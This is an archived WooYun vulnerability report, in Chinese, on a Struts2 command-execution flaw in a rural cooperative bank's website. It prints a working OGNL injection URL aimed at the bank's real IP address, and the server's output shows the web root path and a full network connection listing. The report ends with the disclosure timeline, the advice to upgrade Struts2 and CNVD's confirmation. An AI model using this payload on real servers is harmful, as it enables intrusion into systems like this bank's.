乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-04-04: 细节已通知厂商并且等待厂商处理中 2015-04-08: 厂商已经确认,细节仅向厂商公开 2015-04-18: 细节向核心白帽子及相关领域专家公开 2015-04-28: 细节向普通白帽子公开 2015-05-08: 细节向实习白帽子公开 2015-05-23: 细节向公众公开
官网Struts2命令执行漏洞
出问题的是云南昭通昭阳农村合作银行官网,简单测试了下漏洞是否存在未getshell。测试能够输出web地址:
http://222.220.144.95/front/company.shtml?redirect:${%23w%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse').getWriter(),%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23w.println(%23req.getRealPath("/")),%23w.flush(),%23w.close()}
输出:D:\apache-tomcat-6.0.37\webapps\ROOT\ 执行命令:
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING TCP 0.0.0.0:135 0.0.0.0:0 LISTENING TCP 0.0.0.0:445 0.0.0.0:0 LISTENING TCP 0.0.0.0:3306 0.0.0.0:0 LISTENING TCP 0.0.0.0:8009 0.0.0.0:0 LISTENING TCP 0.0.0.0:47001 0.0.0.0:0 LISTENING TCP 0.0.0.0:49152 0.0.0.0:0 LISTENING TCP 0.0.0.0:49153 0.0.0.0:0 LISTENING TCP 0.0.0.0:49154 0.0.0.0:0 LISTENING TCP 0.0.0.0:49155 0.0.0.0:0 LISTENING TCP 0.0.0.0:49158 0.0.0.0:0 LISTENING TCP 0.0.0.0:49159 0.0.0.0:0 LISTENING TCP 127.0.0.1:3306 127.0.0.1:61018 ESTABLISHED TCP 127.0.0.1:3306 127.0.0.1:61019 ESTABLISHED TCP 127.0.0.1:3306 127.0.0.1:61020 ESTABLISHED TCP 127.0.0.1:3306 127.0.0.1:61021 ESTABLISHED TCP 127.0.0.1:3306 127.0.0.1:61022 ESTABLISHED TCP 127.0.0.1:3306 127.0.0.1:61023 ESTABLISHED TCP 127.0.0.1:3306 127.0.0.1:61024 ESTABLISHED TCP 127.0.0.1:3306 127.0.0.1:61025 ESTABLISHED TCP 127.0.0.1:3306 127.0.0.1:61026 ESTABLISHED TCP 127.0.0.1:3306 127.0.0.1:61027 ESTABLISHED TCP 127.0.0.1:8005 0.0.0.0:0 LISTENING TCP 127.0.0.1:16062 0.0.0.0:0 LISTENING TCP 127.0.0.1:16063 0.0.0.0:0 LISTENING TCP 127.0.0.1:60998 127.0.0.1:3306 TIME_WAIT TCP 127.0.0.1:60999 127.0.0.1:3306 TIME_WAIT TCP 127.0.0.1:61000 127.0.0.1:3306 TIME_WAIT TCP 127.0.0.1:61001 127.0.0.1:3306 TIME_WAIT TCP 127.0.0.1:61002 127.0.0.1:3306 TIME_WAIT TCP 127.0.0.1:61003 127.0.0.1:3306 TIME_WAIT TCP 127.0.0.1:61004 127.0.0.1:3306 TIME_WAIT TCP 127.0.0.1:61005 127.0.0.1:3306 TIME_WAIT TCP 127.0.0.1:61006 127.0.0.1:3306 TIME_WAIT TCP 127.0.0.1:61007 127.0.0.1:3306 TIME_WAIT TCP 127.0.0.1:61008 127.0.0.1:3306 TIME_WAIT TCP 127.0.0.1:61009 127.0.0.1:3306 TIME_WAIT TCP 127.0.0.1:61010 127.0.0.1:3306 TIME_WAIT TCP 127.0.0.1:61011 127.0.0.1:3306 TIME_WAIT TCP 127.0.0.1:61012 127.0.0.1:3306 TIME_WAIT TCP 127.0.0.1:61013 127.0.0.1:3306 TIME_WAIT TCP 127.0.0.1:61014 127.0.0.1:3306 TIME_WAIT TCP 127.0.0.1:61015 127.0.0.1:3306 TIME_WAIT TCP 127.0.0.1:61016 127.0.0.1:3306 TIME_WAIT TCP 127.0.0.1:61017 127.0.0.1:3306 TIME_WAIT TCP 127.0.0.1:61018 127.0.0.1:3306 ESTABLISHED TCP 127.0.0.1:61019 127.0.0.1:3306 ESTABLISHED TCP 127.0.0.1:61020 127.0.0.1:3306 ESTABLISHED TCP 127.0.0.1:61021 127.0.0.1:3306 ESTABLISHED TCP 127.0.0.1:61022 127.0.0.1:3306 ESTABLISHED TCP 127.0.0.1:61023 127.0.0.1:3306 ESTABLISHED TCP 127.0.0.1:61024 127.0.0.1:3306 ESTABLISHED TCP 127.0.0.1:61025 127.0.0.1:3306 ESTABLISHED TCP 127.0.0.1:61026 127.0.0.1:3306 ESTABLISHED TCP 127.0.0.1:61027 127.0.0.1:3306 ESTABLISHED TCP 222.220.144.95:80 202.106.149.178:37474 TIME_WAIT TCP 222.220.144.95:80 202.106.149.178:37529 ESTABLISHED TCP 222.220.144.95:135 23.244.84.222:4521 ESTABLISHED TCP 222.220.144.95:139 0.0.0.0:0 LISTENING TCP 222.220.144.95:53189 23.234.41.214:12080 ESTABLISHED
D:\apache-tomcat-6.0.37\webapps\ROOT\
升级Struts2版本
危害等级:高
漏洞Rank:11
确认时间:2015-04-08 15:16
CNVD确认并复现所述情况,已经转由CNCERT下发给相应分中心,由其后续协调网站管理单位处置
暂无